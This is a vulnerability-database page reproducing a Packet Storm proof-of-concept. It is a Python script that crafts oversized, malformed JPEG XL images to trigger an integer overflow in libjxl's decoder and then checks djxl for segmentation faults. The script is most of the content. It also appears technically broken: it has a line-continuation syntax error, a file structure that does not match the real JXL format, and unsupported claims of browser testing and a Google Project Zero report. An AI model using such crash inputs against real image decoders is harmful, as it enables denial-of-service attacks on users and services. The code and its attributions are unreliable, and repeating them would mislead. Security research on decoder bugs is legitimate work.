Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Libjxl Integer Overflow

🗓️ 16 Mar 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 108 Views

Tool generates malicious JPEG XL images to test integer overflow in libjxl, with two PoCs.

Code
=============================================================================================================================================
    | # Title     : Libjxl Malicious Image Crafting Integer Overflow Generator                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://github.com/libjxl/libjxl/blob/main/lib/jxl/decode.cc                                                                |
    =============================================================================================================================================
    
    [+] Summary    : This Python script generates malicious JPEG XL (JXL) image files designed to test a potential Integer Overflow vulnerability in libjxl. 
                     The tool creates specially crafted JXL images with extremely large dimensions and manipulated headers that can trigger memory miscalculations when processed by vulnerable decoders.
    
    [+] The script produces two proof-of-concept files:
    
    poc32.jxl – targets 32-bit systems, using image dimensions (16384×16384) with RGBA float32 channels that theoretically require ~4 GB of memory, potentially causing integer overflow during allocation.
    
    poc64.jxl – targets 64-bit systems, using extremely large dimensions (2³¹ × 2³⁰ pixels) to stress size calculations inside the decoder.
    
    The generator builds a simplified JXL structure containing:
    
    A valid JXL signature
    
    A jxlc codestream box with an intentionally oversized length
    
    A manipulated image header specifying excessive width, height, and channel configuration
    
    Random padding to simulate image data
    
    Additionally, the script includes a testing function that attempts to decode the generated file using the djxl tool from libjxl and checks for crashes such as SIGSEGV, which may indicate successful triggering of the vulnerability.
    
    			  
    [+] POC   : 
    
    
    #!/usr/bin/env python3
    
    import struct
    import sys
    import os
    
    def generate_poc_32bit(filename="poc32.jxl"):
        """
        Generates a JXL image to exploit the vulnerability on 32-bit systems.
        Dimensions: 16384×16384 RGBA float32 (4*4*16384*16384 = 4GB)
        """
        print(f"[*] Generating {filename} for 32-bit systems...")
    
        jxl_data = bytearray(b'\xff\x0a') 
    
        box_size = 0xFFFFFFFF 
        box_type = b'jxlc'     
        codestream = bytearray([
            0x00, 0x00, 0x00, 0x0C,  
            0x4A, 0x58, 0x4C, 0x20, 
            0x00, 0x40, 0x00, 0x40, 
            0x04, 0x04,             
            0x00, 0x00,             
    
        ] + bytearray(os.urandom(1024))) 
    
        with open(filename, 'wb') as f:
            f.write(jxl_data)
            f.write(struct.pack('<I', box_size))
            f.write(box_type)
            f.write(codestream)
        
        print(f"[+] Successfully generated {filename}")
        return filename
    
    def generate_poc_64bit(filename="poc64.jxl"):
        """
        Generates a JXL image to exploit the vulnerability on 64-bit systems.
        Maximum dimensions: 2^31 × 2^30 pixels
        """
        print(f"[*] Generating {filename} for 64-bit systems...")
        
        width = 0x80000000  
        height = 0x40000000 
        
        jxl_data = bytearray(b'\xff\x0a')
        
    
        codestream = struct.pack('<II', width, height) + \
                     struct.pack('<BB', 4, 32) + \  
                     bytearray(os.urandom(2048))
        
        with open(filename, 'wb') as f:
            f.write(jxl_data)
            f.write(struct.pack('<I', 0xFFFFFFFF))
            f.write(b'jxlc')
            f.write(codestream)
        
        print(f"[+] Successfully generated {filename}")
        return filename
    
    def test_vulnerability(jxl_file, djxl_path="./djxl"):
        """
        Test the vulnerability on the target application.
        """
        import subprocess
        import time
        
        print(f"[*] Testing {jxl_file} on {djxl_path}...")
        
        try:
    
            start = time.time()
            result = subprocess.run([djxl_path, jxl_file, "--disable_output"], 
                                     capture_output=True, timeout=10)
            end = time.time()
            
            if result.returncode == -11:  
                print("[!] Vulnerability Confirmed: Segmentation Fault!")
                return True
            else:
                print(f"[-] Vulnerability not exploited: {result.returncode}")
                return False
                
        except subprocess.TimeoutExpired:
            print("[!] Application did not respond (maybe crash?)")
            return True
        except Exception as e:
            print(f"[!] Error: {e}")
            return False
    
    def main():
        print("="*60)
        print("JXL Integer Overflow PoC Generator")
        print("Google Project Zero - Vulnerability Report")
        print("="*60)
    
        poc32 = generate_poc_32bit()
        poc64 = generate_poc_64bit()
        
        print(f"\n[*] Created Files:")
        print(f"    - {poc32} (32-bit exploit)")
        print(f"    - {poc64} (64-bit exploit)")
        
        print(f"\n[*] To Test:")
        print(f"    $ ./build-i686/tools/djxl {poc32} --disable_output")
        print(f"    $ ./djxl {poc64} --disable_output")
        
    if __name__ == "__main__":
        main()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
libjxljpeg xlinteger overflowmalicious imageproof of concept
108